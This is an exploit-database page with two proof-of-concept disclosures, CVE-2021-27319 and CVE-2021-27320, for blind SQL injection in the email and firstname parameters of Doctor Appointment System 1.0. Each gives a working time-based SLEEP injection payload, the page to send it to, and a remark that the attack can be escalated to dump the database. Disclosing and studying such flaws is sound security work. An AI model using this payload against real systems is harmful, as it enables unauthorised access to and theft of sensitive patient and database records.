Share
## https://sploitus.com/exploit?id=PACKETSTORM:161642
# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in email parameter  
# Date: 03-03-2021  
# CVE: CVE-2021-27319  
# Exploit Author: Nakul Ratti  
# Vendor Homepage:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Software Link:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Version: V1.0  
  
Vulnerable File:  
----------------  
http://host/doctorappointment/contactus.php  
<http://host/patient/search_result.php>  
  
Vulnerable Issue:  
-----------------  
email parameter has no input validation  
  
POC:  
----  
1] Navigate to http://host/doctorappointment/contactus.php  
2] In the email parameter enter following payload to exploit blind SQL  
Injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1  
3] This can further be escalated to dump sensitive information from the  
database  
------------------  
  
# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in firstname parameter  
# Date: 03-03-2021  
# CVE: CVE-2021-27320  
# Exploit Author: Nakul Ratti  
# Vendor Homepage:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Software Link:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Version: V1.0  
  
Vulnerable File:  
----------------  
http://host/doctorappointment/contactus.php  
<http://host/patient/search_result.php>  
  
Vulnerable Issue:  
-----------------  
firstname parameter has no input validation  
  
POC:  
----  
1] Navigate to http://host/doctorappointment/contactus.php  
2] In the firstname parameter enter following payload to exploit blind SQL  
Injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1  
3] This can further be escalated to dump sensitive information from the  
database  
------------------